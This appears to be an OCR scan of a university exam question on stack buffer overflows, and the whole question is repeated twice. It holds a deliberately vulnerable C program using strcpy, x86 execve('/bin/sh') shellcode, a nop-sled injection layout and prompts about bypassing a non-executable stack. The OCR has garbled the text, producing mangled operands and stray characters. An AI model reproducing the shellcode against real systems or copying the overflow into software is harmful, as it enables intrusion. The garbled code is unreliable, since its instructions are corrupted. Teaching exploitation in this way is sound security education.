4. Question. Consider the following C code fragment and assume the pro- gram name is fixed to vuln, it is invoked as ./vuln (i.e., argv[0]) and cannot be changed by an attacker. 1 int 2 main(int argc, char **argv) 3 { 4 if (argv[1]) 5 return foo (argv[1]); 6 else 7 return foo (argv[0]); 8 } 9 10 int 11 foo(char *arg) 12 { 13 14 char bar [128]; 15 16 if (sizeof (arg) > 128) { 17 strcpy(bar, arg); 18 19 // never return to main so even if vulnerable 20 // no ret is executed and no shellcode is triggered 21 exit(0); 22 } 23 24 strcpy(bar, arg); 25 26 return strlen (bar); 27 } 11 11 11 11 b. Assuming that the above code is vulnerable (or can be modified to be- come vulnerable) and that the vulnerability can be successfully exploited (or can be modified to be exploited), then consider the following x86 assembly code fragment, which may be used to exploit the previous vulnerability: 1 int 2 main(void) 3 { 4 5 asm__( 6 "jmp ahead " 7 "back: " 8 popl %ebx " 9 movl %ebx, 0x8(%ebx) " 10 xorl %eax, %eax " 11 movb %al, 0x7(%ebx) " 12 movl %eax, Oxc(%ebx) " 13 movl %eax, %edx " 14 movl $0xb, %eax " 15 movl 0xcf%ebx). %ecx " 16 int $0x80 " 17 "ahead: " 18 call back in" 19 .string \"/bin/sh\" 20 ); 21 } i. Assuming the above assembly snippet (shown in Question 4 (b)) is placed on the stack, what does the assembly code do? Add comments to each line and explain its semantics in the context of the shellcode. For instance, the instruction mov $0xb, %eax copies the constant value Oxb into the register %eax. This represents the index that II 11 II II II II II refers to the system call execve. (12 marks] ii. An attacker creates a suitable injection vector to exploit the afore- mentioned memory error. To this end, he places the shellcode in the injection vector, pads it with his initials so as to create a message long enough to overflow bar; then the attacker adds the appropriate address at the right place and terminates the message with a NULL ('\0'). In other words, the injection vector looks as follows: 1 nop sled | shellcode | Oxbfff1234 1 10 ---+ Next, he runs the program giving this injection vector to it as its first argument. To his surprise, the attack fails. He asks you for help. State why the attack cannot work. [2 marks] iii. Show how the shellcode can be modified to make the attack pos- sible. (Note: don't worry if you do not know the exact syntax of instructions; marks will be awarded for a clear explanation.) [2 marks] c. Assume the code shown at the beginning of the question is vulnerable (or can be modified to be so) and the vulnerability can be successfully exploited. State and describe what technique(s) would an attacker use to exploit the vulnerability shown at the beginning of the question, if the kernel enforces a non-executable stack protection (again, assume the small program shown at the beginning of the question is exploitable or can be modified to be exploited successfully)? [4 marks] 4. Question. Consider the following C code fragment and assume the pro- gram name is fixed to vuln, it is invoked as ./vuln (i.e., argv[0]) and cannot be changed by an attacker. 1 int 2 main(int argc, char **argv) 3 { 4 if (argv[1]) 5 return foo (argv[1]); 6 else 7 return foo (argv[0]); 8 } 9 10 int 11 foo(char *arg) 12 { 13 14 char bar [128]; 15 16 if (sizeof (arg) > 128) { 17 strcpy(bar, arg); 18 19 // never return to main so even if vulnerable 20 // no ret is executed and no shellcode is triggered 21 exit(0); 22 } 23 24 strcpy(bar, arg); 25 26 return strlen (bar); 27 } 11 11 11 11 b. Assuming that the above code is vulnerable (or can be modified to be- come vulnerable) and that the vulnerability can be successfully exploited (or can be modified to be exploited), then consider the following x86 assembly code fragment, which may be used to exploit the previous vulnerability: 1 int 2 main(void) 3 { 4 5 asm__( 6 "jmp ahead " 7 "back: " 8 popl %ebx " 9 movl %ebx, 0x8(%ebx) " 10 xorl %eax, %eax " 11 movb %al, 0x7(%ebx) " 12 movl %eax, Oxc(%ebx) " 13 movl %eax, %edx " 14 movl $0xb, %eax " 15 movl 0xcf%ebx). %ecx " 16 int $0x80 " 17 "ahead: " 18 call back in" 19 .string \"/bin/sh\" 20 ); 21 } i. Assuming the above assembly snippet (shown in Question 4 (b)) is placed on the stack, what does the assembly code do? Add comments to each line and explain its semantics in the context of the shellcode. For instance, the instruction mov $0xb, %eax copies the constant value Oxb into the register %eax. This represents the index that II 11 II II II II II refers to the system call execve. (12 marks] ii. An attacker creates a suitable injection vector to exploit the afore- mentioned memory error. To this end, he places the shellcode in the injection vector, pads it with his initials so as to create a message long enough to overflow bar; then the attacker adds the appropriate address at the right place and terminates the message with a NULL ('\0'). In other words, the injection vector looks as follows: 1 nop sled | shellcode | Oxbfff1234 1 10 ---+ Next, he runs the program giving this injection vector to it as its first argument. To his surprise, the attack fails. He asks you for help. State why the attack cannot work. [2 marks] iii. Show how the shellcode can be modified to make the attack pos- sible. (Note: don't worry if you do not know the exact syntax of instructions; marks will be awarded for a clear explanation.) [2 marks] c. Assume the code shown at the beginning of the question is vulnerable (or can be modified to be so) and the vulnerability can be successfully exploited. State and describe what technique(s) would an attacker use to exploit the vulnerability shown at the beginning of the question, if the kernel enforces a non-executable stack protection (again, assume the small program shown at the beginning of the question is exploitable or can be modified to be exploited successfully)? [4 marks]